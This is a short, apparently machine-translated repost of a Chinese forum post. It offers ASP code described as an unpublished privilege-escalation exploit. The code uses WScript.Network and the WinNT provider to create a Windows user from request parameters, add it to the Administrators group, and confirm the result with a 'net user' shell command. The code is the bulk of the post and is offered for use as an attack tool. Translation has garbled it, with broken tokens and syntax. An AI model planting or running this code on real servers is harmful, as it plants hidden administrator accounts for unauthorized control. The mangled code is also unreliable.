Blue screen original add superuser .asp code

xiaoxiao2021-03-06  39

[Reserved] Blue screen original add super user's .asp code Kevin improves MS unpublished vulnerability

Source: Author freezing forum: Kevin (kevin1986) .network object scripts privilege escalation exploits

User:
Password:
< % @ codepage = 936%> <% on error resume nextif request.servervariables ("remote_addr") <> "127.0.0.1" Then Response.write "IP! S N0T Right" ELSE IF Request ("UserName") <> " "then username = request (" username ") passwd = request (" passwd ") Response.Expires = 0 Session.TimeOut = 50 Server.ScriptTimeout = 3000 set lp = Server.CreateObject (" WSCRIPT.NETWORK ") oz =" WinNT : // "& lp.computername set ob = getObject (oz) set oe = getObject (oz &" / administrators, group ") set = ob.create (" user ", username) od.setPassword passwd od.setinfo oe.add Oz & "/" & username if Err Then Response.write "~~ Today you still don't buy 6 1 ... The province is 2 yuan to buy a bottle can be happy ..." Else if Ibject ("WScript. Shell "). EXEC (" cmd.exe / c net user "& username.stdout.readall)," Last Login "> 0 TH EN RESPONSE.WRITE "Although there is no mistake, it seems that there is no success. You must be very depressed" Else Response.write "omg!" & username "account is actually become! This is an unknown vulnerability. 5,000,000RMB is yours. "End if End if else response.write" Please enter the input user name "End if End IF%"

转载请注明原文地址:https://www.9cbs.com/read-76456.html

New Post(0)